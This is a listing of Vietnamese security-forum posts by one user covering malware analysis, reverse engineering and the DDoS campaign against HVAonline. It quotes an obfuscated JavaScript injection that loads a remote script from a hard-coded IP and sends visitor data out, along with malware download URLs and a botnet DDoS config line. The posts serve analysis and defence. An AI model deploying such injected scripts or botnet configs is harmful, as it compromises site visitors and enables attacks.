<![CDATA[Messages posted by "acoustics89"]]> /hvaonline/posts/listByUser/246538.html JForum - http://www.jforum.net Ollybg Tut 16 ++++

kienmanowar wrote:

bantinbk wrote:
Sao mình còn lưu bộ Ollydbg tut của bạn kienmanowar tới 22 nhỉ, còn ghi chú từ được soạn từ ngày 27/01/2010 
Quá chuẩn :). Đến tut22 thì do quá bận rộn nên đành tạm treo Regards, 
Anh có kế hoạch cho tut23 chưa anh? Anh làm loạt tut về unpack driver được không ạ? Em có đọc một số bài viết của inREVERSE về Driver packer nhưng có một số chỗ vẫn chưa hiểu, ví dụ như: - Theo bài viết của inREVERSE: "cần đổi giá trị subsystem type của driver từ Native thành Windows GUI và chạy nó như một file thực thi thông thường". Do đó, có thể dùng Olly để unpack. Trong trường hợp driver gọi các hàm, structure của kernel thì em phải làm thế nào? - Nếu buộc phải unpack driver ở kernel mode, thì dump và fix IAT thế nào ạ? Mong nhận được hồi âm của anh !]]>
/hvaonline/posts/preList/32420/275806.html#275806 /hvaonline/posts/preList/32420/275806.html#275806 GMT
Tại sao khi sử dụng Crontabl thì không lệnh không thực hiện ?

quanta wrote:
Bạn có thể dùng `incrond`, tiếp theo là `watcher`. Hoặc "cao cấp" hơn là DRBD + GFS2.  
Mình vote cho DRBD + GFS2. Bạn chủ thread nên dùng thử]]>
/hvaonline/posts/preList/44695/275541.html#275541 /hvaonline/posts/preList/44695/275541.html#275541 GMT
Bị hack & xem trộm Gmail, Facebook /hvaonline/posts/preList/44093/273065.html#273065 /hvaonline/posts/preList/44093/273065.html#273065 GMT Decode javascript /hvaonline/posts/preList/43787/270957.html#270957 /hvaonline/posts/preList/43787/270957.html#270957 GMT Nhờ mọi người unpack giúp mình cái này /hvaonline/posts/preList/43589/270308.html#270308 /hvaonline/posts/preList/43589/270308.html#270308 GMT FTP Bounce Attack /hvaonline/posts/preList/43595/270211.html#270211 /hvaonline/posts/preList/43595/270211.html#270211 GMT Putty dính virus Code:
Windows7:

\\.\STORAGE#Volume#_??_USBSTOR#Disk&Ven_____USB&Prod_FLASH_DRIVE&Rev_#12345000100000000173&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~*.exe

Windows Vista:

\\.\STORAGE#Volume#1&19f7e59c&0&_??_USBSTOR#Disk&Ven_____USB&Prod_FLASH_DRIVE&Rev_#12345000100000000173&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~*.exe

Windows XP, Windows Server 2003 and Windows 2000:

\\.\STORAGE#RemovableMedia#8&1c5235dc&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~*.exe
một file CPL chứa thông tin về icon của shortcut. khi explorer gọi Shell32.LoadCPLModule, các shortcut độc sẽ chạy virus. Có 2 module mở cổng lắng nghe kết nối từ bên ngoài module thứ nhất mở cổng 4678, hiện đang bị disable. có lẽ người code chưa hoàn thiện tính năng này module thứ 2 mở cổng 21, khiến máy nạn nhân thành 1 ftp server. username và password của ftp server này giống nhau, được hardcode trong virus, gồm 9 kí tự. Mình cài đặt mẫu virus này lên máy ảo trong mạng local của mình, và dùng file zilla để truy cập. Mình đưa ra kết luận, những máy tính bị virus rất có thể sẽ bị mất mát dữ liệu Ramnit kết nối tới 1 loạt server theo giao thức http để cập nhật và thực thi lệnh, chụp ảnh màn hình (? - tính năng này mình đang phân tích ) và 2 lệnh kos, dml , không hiểu để làm gì Phương án: bạn có thể dùng phần mềm diệt virus quét toàn bộ máy, nếu không thì cài lại win cho nhanh. Máy tính nhiễm lây file rồi diệt mất nhiều thời gian hơn cài lại đấy]]>
/hvaonline/posts/preList/43568/270170.html#270170 /hvaonline/posts/preList/43568/270170.html#270170 GMT
FTP Bounce Attack

n2tforever wrote:
cái này theo mình hiểu thì TCP là một kết nối 2 chiều vì thế cả client và server đều phải mở cổng để kết nối , số cổng client gửi ở lệnh PORT là cổng trên máy client (thường lớn hơn 1023) , server sau đó sẽ dùng cổng 20 của mình để kết nối đến cổng đó.  
Server chỉ cần kết nối tới client là được, cần gì phải qua cổng 20. trường hợp nhiều client thì server sẽ dùng cổng 20 cho client nào?? Cổng 20 chỉ là lý thuyết, thực tế sẽ khác bạn ạ]]>
/hvaonline/posts/preList/43595/270169.html#270169 /hvaonline/posts/preList/43595/270169.html#270169 GMT
FTP Bounce Attack /hvaonline/posts/preList/43595/270158.html#270158 /hvaonline/posts/preList/43595/270158.html#270158 GMT Cần giúp đỡ về PE Header ! /hvaonline/posts/preList/43167/268548.html#268548 /hvaonline/posts/preList/43167/268548.html#268548 GMT Cần hướng dẫn lập trình trojan

phanledaivuong wrote:

acoustics89 wrote:
Ôi, các bạn đang nói về thầy mình :D  
A, hoá ra trẻ tuổi acoustics89 trước học BK. ..  
bây giờ mình đã ra trường đâu. Hôm nào mấy bạn tới thăm bk đi; nhớ đợt trước có 1 đoàn sinh viên hay giáo viên nước ngoài , sang BK tham quan, họ nhận xét 1 câu :"Phòng thí nghiệm của các bạn y hệt của chúng tôi cách đây 20 năm" =(( ]]>
/hvaonline/posts/preList/41743/260720.html#260720 /hvaonline/posts/preList/41743/260720.html#260720 GMT
Cần hướng dẫn lập trình trojan /hvaonline/posts/preList/41743/260704.html#260704 /hvaonline/posts/preList/41743/260704.html#260704 GMT Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?

paranoidx wrote:
Không biết ở đây còn nhận hàng không. Mình bị 1 con gì chả biết, nó lây lan trên website của mình, đây là đoạn mã của nó : var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ; Hiện tại mình đã hồi phục. Nhưng ko biết còn bị nữa không. Bạn có thể cho mình biết cách nào nó đã lây vào các file *.js có trong host của mình không ? các file js đều là hàm chạy nội bộ chỉ xử lý animation, mình dùng wordpress. Thân, 
TimThumb trong theme có lỗ hổng , và lỗ hổng này cũng bị khai thác khá nhiều rồi http://www.exploit-db.com/wordpress-timthumb-exploitation mong bạn bol có thể chỉ giáo thêm, về phần này mình mù tịt]]>
/hvaonline/posts/preList/27945/254634.html#254634 /hvaonline/posts/preList/27945/254634.html#254634 GMT
Cách vượt qua một phần mềm check Lisence bằng RSA /hvaonline/posts/preList/41120/254633.html#254633 /hvaonline/posts/preList/41120/254633.html#254633 GMT Cách vượt qua một phần mềm check Lisence bằng RSA /hvaonline/posts/preList/41120/253945.html#253945 /hvaonline/posts/preList/41120/253945.html#253945 GMT Các lớp học miễn phí của đại học Stanford /hvaonline/posts/preList/40736/251785.html#251785 /hvaonline/posts/preList/40736/251785.html#251785 GMT Nhiều biến XOR với nhau Code:
int a = 5;
int b = 7;
a ^= b ^= a ^= b;
hỏi sau đoạn code trên, a = ? và b = ?]]>
/hvaonline/posts/preList/40893/251765.html#251765 /hvaonline/posts/preList/40893/251765.html#251765 GMT
Cách diệt autorun vs virus usb hiệu quả nhất mình từng biết

J4ckSparrow wrote:
nó không tốn ram như các chương trình virus. Trường hợp phần mềm virus bị nhiễm lun thì sao ? Lây lan toàn tập. Bởi vì lúc ta đã xóa xong rút ra ngay thì ngăn chặn việc lưu trữ ( tạo) lại file autorun.inf 
Có lẽ bạn chưa biết cơ chế tự bảo vệ của các antivirus nhỉ. trường hợp cài AV mà cũng vẫn bị nhiễm thì khác gì không cài, người ta tốn tiền làm gì. Theo mình để an toàn chỉ có 2 cách: 1. Dùng Linux 2. Dùng windows + cập nhật + AV. không cần mẹo gì hết, đỡ phiền. AV giờ dư sức chặn các virus lây qua usb]]>
/hvaonline/posts/preList/40474/251180.html#251180 /hvaonline/posts/preList/40474/251180.html#251180 GMT
sữ dụng máy ảo có thật sự an toàn trước virut

peter_nguyen1405 wrote:
Không biết mình hiểu bài viết của bạn như vầy có đúng không. Khi cấu hình máy ảo xài card bridge như bạn thì máy ảo gần như là 1 máy client chạy song song với máy thật ( về khía cạnh mạng Lan). Nếu mình hiểu như thế là đúng, vậy làm sao đỡ được trường hợp Virus flood mạng Lan ? Dạng kiểu như các dòng misa.exe hoặc Kavo. Mình cũng gặp tình trạng 1 máy nào đó trong mạng lan thường xuyên broad cast các gói tin để truyền các mã độc trong môi trường Lan. Không biết anh em có ai rành loại này và cách khắc phục 
Bạn có lẽ chưa đọc kĩ bài viết của mình. Mình cũng nói là 2 máy tính khi đó ngang hàng nhau trong LAN. Mình cũng đã nghĩ đến trường hợp bạn nêu nên mình khuyên khi dùng bridge thì nên tạo VLAN. ( Tham khảo : ) http://en.wikipedia.org/wiki/Virtual_LAN mục đích để cách ly máy ảo và máy thật với nhau. Cách thiết lập VLAN có lẽ các bạn tìm trên internet sẽ đầy đủ và chi tiết hơn]]>
/hvaonline/posts/preList/40811/251179.html#251179 /hvaonline/posts/preList/40811/251179.html#251179 GMT
sữ dụng máy ảo có thật sự an toàn trước virut

Ky0 wrote:
Thực ra các antivirus quét vùng nhớ được cấp phát cho máy ảo nên phát hiện ra thôi! Nguy cơ nhiễm virus từ máy ảo khá cao, và thực tế đã có vài loại virus đã lây lan từ máy ảo qua máy thật. Tốt nhất nên dùng Ollydebug hoặc một tool nào đó khác chạy chương trình step by step phân tích thì hay hơn :D - Ky0 -  
Gặp packer hoặc anti-debug trick thì móm anh ơi. Olly cũng ghê lắm. dùng máy ảo cho tiện]]>
/hvaonline/posts/preList/40811/251156.html#251156 /hvaonline/posts/preList/40811/251156.html#251156 GMT
sữ dụng máy ảo có thật sự an toàn trước virut

khang0001 wrote:

TheShinichi wrote:

khang0001 wrote:
mình có thói quen dùng máy ảo để test virut và xài soft có keygen hay patch. thế nhưng thỉnh thoảng vẫn thấy anti virut của mình báo là có virut dc phát hiện ở máy ảo. mình xài virturl box. cấu hình mạng xài nat, không share bất cứ folder nào ở máy chính cho máy ảo và ngược lại. mình nghĩ nếu virut mà bị phát hiện như thế thì các con virut mới hơn , qua mặt dc anti virut thì khả năng máy chính bị nhiễm khá cao. có pác nào có cao kiến gì để có thể test virut an toàn trong máy ảo không 
Bạn có thể mô tả chi tiếp phần màu đỏ không ? Mình chưa hình dung được ? 
có nghĩa là khi mình sữ dụng soft có crack hoặc lướt web thì trình anti virut của mình cảnh báo có 1 con virut abc gì gì đó ở trong máy ảo. và nó đã block . theo mình hiểu thì có thể con virut đó đã thoát ra khỏi máy ảo xâm nhập vào máy thật nên anti virut đã cảnh báo . hình nè
 
Theo mình đọc mô tả, và quan trọng nhất là hình bạn đưa, mình cho rằng bạn vẫn An toàn khi dùng máy ảo, không cần phải lo lắng. Lý do có thông báo của KIS: mình đoán bạn dùng máy ảo, thiết lập ở chế độ NAT khi truy cập mạng, khi đó mọi luồng dữ liệu của máy ảo trước tiên phải đi qua máy thật rồi mới ra ngoài. Địa chỉ kết nối tới chứa mã độc, do KIS phát hiện ra, nên KIS thông báo. Tiến trình kết nối là máy ảo. Cách khắc phục: Bạn thiết lập Network Adapter của máy ảo là Bridge. Máy ảo của bạn sẽ tương đương 1 máy tính khác trong LAN, ngang hàng với máy thật. Trong chế độ này, bạn hãy tắt chế độ chia sẻ file của máy thật và cập nhật các bản vá cho máy thật, đề phòng bị tấn công khi máy thật có lỗ hổng. Ngoài ra để an toàn cho bạn, bạn thiết lập 1 VLAN, sau đó đặt chế độ Bridge cho máy ảo, sử dụng dải VLAN khác với máy thật. Điều này sẽ là tốt nhất cho bạn, hạn chế các tấn công kiểu Zero-day. Về việc quét bộ nhớ của máy ảo: theo mình là có khả năng này, nhưng cực thấp vì những lý do sau: - Bộ nhớ máy ảo được mã hoá và tổ chức khác với dữ liệu bình thường, do đó nếu không sử dụng các API do máy ảo cung cấp, bạn không thể truy cập được dữ liệu này. Theo mình biết, hiện tại VMware cung cấp API cho phép quét các file và bộ nhớ bên trong máy ảo, VirtualBox thì không biết thế nào - Nếu AV quét cả nội dung dữ liệu bên trong máy ảo, thường AV đó hay đặt tại các server hoặc các máy host cho thuê. Trong các version cho người dùng thông thường, họ sẽ bỏ tính năng này vì không cần thiết.]]>
/hvaonline/posts/preList/40811/251155.html#251155 /hvaonline/posts/preList/40811/251155.html#251155 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Mấy bro BKIS này hèn vãi không ra mặt nhưng vẫn âm thầm theo dõi topic để update virus mới vào Database. đúng là miếng thịt ngon thì đớp chặt cục xương khó nhằn thì nhè ra.  
bạn này có vẻ thù hằn nhỉ. AV cập nhật là điều tốt, hay bạn không muốn thế, bạn không muốn cái AV được người Việt sử dụng diệt các mẫu virus người Việt bị nhiễm nhiều nhất. Bạn muốn các virus này tồn tại mãi mãi trên máy người Việt và được cập nhật liên tục chứ gì. Avira , KIS, Microsoft,... cũng cập nhật đấy, để mình viết mail nhắc họ lập nick ở đây, nếu không lại mang tiếng hèn, mang tiếng đớp chặt cục xương. Xét ra chỉ có Symantec không cập nhật, không hèn =)) ]]>
/hvaonline/posts/preList/39641/245711.html#245711 /hvaonline/posts/preList/39641/245711.html#245711 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
Gửi các bro mẫu GoogleUpdate.exe, em check không thấy có Digital Sig Scan trên VirusTotal thì ra 1 đống nhưng toàn là Virus Sality http://www.virustotal.com/file-scan/report.html?id=f258be0f4ea0174f87731f0c879170ba162dcfba058bf9dd3c5aead98252fc0e-1314072852 http://www.mediafire.com/?k7xd7nj50bs59jv (Chú ý: Các bạn không nên dơwnload File GoogleUpdate.exe này về máy, trừ khi muốn nghiên cứu một virus khác, virus "Sality". Virus Sality có đăc điểm khi nhiễm vào máy sẽ tìm tất cả các file .exe trong máy và nhân bản virus. Virus lấy tên file nguyên bản mà nó vừa nhiễm vào. Vì vậy trong máy sẽ đầy rẫy các nhân bản virus Sality và hệ thông sẽ ngưng chạy-PXMMRF-HVA
Lâu lâu mới vào forum, anh em post nhộn nhịp quá :D Trong khi chờ toàn bộ file mới của GoogleCrashHandle thì em tải file này về phân tích thử, xem Sality là virus gì mà thấy các hãng phải có tool riêng để remove. Phải đổi gió chút, code của stl RE mãi cũng chán, vì lần nào cũng giống nhau cả.]]>
/hvaonline/posts/preList/39641/245682.html#245682 /hvaonline/posts/preList/39641/245682.html#245682 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Ừ, lạ ha ! Sao giờ decode lại được, lúc chiều wget về thì decode không được ? Cảm ơn acoustics89 nhé ! À anh quên mất, hồi đó em có PM cho anh, anh xoá mất rồi. Mẫu nào download thằng top.jpg từ http://penop.net/top.jpg ? Sẵn tiện acoustics89 xem lại hàm decode top.jpg của em luôn nhé, anh build hay dựa trên nó viết script đều decode không ra. 
thuật toán decode thì đoạn này là quan trọng nhất, em decode ra 1 xâu unicode nhưng mà làm vội nên cứ để nguyên thế mà ném vào file txt, anh mở ra thì thấy nó có khoảng cách, dùng tạm cũng được. mẫu tải top là googlecrashhandler, từ đâu chắc anh vẫn nhớ :D Code:
fseek(f, 0, SEEK_END);
 		lSize = ftell(f);
 		fseek(f, 0, SEEK_SET);
 
 		pBuffer =(char*) malloc(lSize+1024);
 		if(pBuffer)
 		{
 			
 			p = (char *)pBuffer+ 4;
 			memset(pBuffer, 0, lSize+1024);
 			fread((char*)pBuffer, lSize, 1, f);
 
 			for ( i = 8; i < lSize; ++i )
 			{
 				v24 = p[v7 % 4];
 				v23 = pBuffer[i];
 				v23 = (v24 ^ v23) % 256;
 				pBuffer[i] = v23;
 				v7++;
 				//v8 += v23 * v7++ % 7;
 			}
 		}
 		fclose(f);
]]>
/hvaonline/posts/preList/39641/244883.html#244883 /hvaonline/posts/preList/39641/244883.html#244883 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Host second.dinest.net lại được stl đánh thức dậy để hoạt động. xc.jpg tại: http://second.dinest.net/xc.jpg (User-Agent: An0nym0453) đã thay đổi cách mã hoá, nên tool decode lúc trước sẽ không decode hết được. Đang chờ đợi acoustics89 RE và cập nhật tool decode. 
em tưởng anh TQN bảo code giải mã file TOP, em post rồi đấy, còn cái kia thì vẫn decode bình thường mà, có lỗi gì đâu]]>
/hvaonline/posts/preList/39641/244875.html#244875 /hvaonline/posts/preList/39641/244875.html#244875 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
#include <stdio.h>
#include <conio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
	FILE *f; int i;
	long lSize;
	char *pBuffer, *p;
	char v24,v23; 
	int v7 = 0;
	
	
	char szOutPut[MAX_PATH] = "";

	if ((argc <2) || (argc >3 ))
	{
		printf("Usage: Decode <Encrypted> <Result>");
		exit(1);

	}
	if (argc == 2)
	{
		strcpy(szOutPut, "Decoded.txt");
	}
	else strncpy(szOutPut, argv[2],MAX_PATH);

	f = fopen(argv[1], "rb"); //doc file da ma hoa

	if (f)
	{
		fseek(f, 0, SEEK_END);
		lSize = ftell(f);
		fseek(f, 0, SEEK_SET);

		pBuffer =(char*) malloc(lSize+1024);
		if(pBuffer)
		{
			
			p = (char *)pBuffer+ 4;
			memset(pBuffer, 0, lSize+1024);
			fread((char*)pBuffer, lSize, 1, f);

			for ( i = 8; i < lSize; ++i )
			{
				v24 = p[v7 % 4];
				v23 = pBuffer[i];
				v23 = (v24 ^ v23) % 256;
				pBuffer[i] = v23;
				v7++;
				//v8 += v23 * v7++ % 7;
			}
		}
		fclose(f);


		if (pBuffer)
		{
			f = fopen(szOutPut, "wb");
			if (f)
			{
				fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
				fclose(f);
			}
			else printf("Can not open output file.");
			delete[] pBuffer ;
		}
	}
	else printf("Can not open input file.");
	return 0;
}
bạn này vẫn dùng http://second.dinest.net/xv.jpg http://second.dinest.net/xc.jpg , user agent như cũ. Các thành phần khác đang phân tích.... O-) ]]>
/hvaonline/posts/preList/39641/244860.html#244860 /hvaonline/posts/preList/39641/244860.html#244860 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:

Nowhereman wrote:
tôi xin có một vài ý ciến như sau : a) STL là một tổ chức tội phạm việt nam sống dưới những tên cơ quan, tổ chức. b) Chẳng có thàng tàu khựa nào tham gia vào vụ DDOS với mailwale made in Viêt cộng này cả . c) Theo tôi kô nên sử dụng các phần mềm diệt virus trong nước, vì bạn thử nghĩ xem bao nhiêu người có thể ngờ rằng, nằm sâu thẳm trong linh hồn những phần mềm "bảo vệ" đó là vài dòng lệnh quản lý và điều hành mọi điều thuộc về bạn. ngay sau khi bạn click install ? . >> trong một cuộc chiến, mọi bên đều có lý do; đúng, sai, phải trái = chịu!!! 
Thế dùng phần mềm nước ngoài thì đảm bảo là an toàn đấy. Nếu muốn an toàn thì tốt nhất là đừng dùng internet. 
Đối với malware của STL thì nên dùng phần mềm của symantec -:-) ]]>
/hvaonline/posts/preList/39641/244852.html#244852 /hvaonline/posts/preList/39641/244852.html#244852 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch wrote:
Giờ này có lẽ HVA vẫn đang bị ddos anh Conmale nhỉ, em mới check lại cái second.dinest.net thì thấy đã trỏ sang 1 IP khác là 46.166.147.48 ở Ru.  
truy cập thử vào http://second.dinest.net/ nó hiện lên trang có 3 chữ lạnh lùng vãi: WTF =)) =)) =)) ]]>
/hvaonline/posts/preList/39641/244604.html#244604 /hvaonline/posts/preList/39641/244604.html#244604 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:
Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA : Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat
 
kiểu mô tả này khá giống với googleCrashHandle trước đây, duy chỉ có điều không dùng steganography. file cấu hình hồi đó rất thô sơ, không xml]]>
/hvaonline/posts/preList/39641/244589.html#244589 /hvaonline/posts/preList/39641/244589.html#244589 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/hvaonline/posts/list/210/39641.html#244332" keepCookies="1" crawling="1" referer="Hey Postmodernism, When you config HVA like X-Cafe?"/>
mà tên em dễ viết như thế mà anh TQN lúc thì accxxxx ( chắc đang nghĩ đến từ account ) lúc thì acourxxx :|]]>
/hvaonline/posts/preList/39641/244398.html#244398 /hvaonline/posts/preList/39641/244398.html#244398 GMT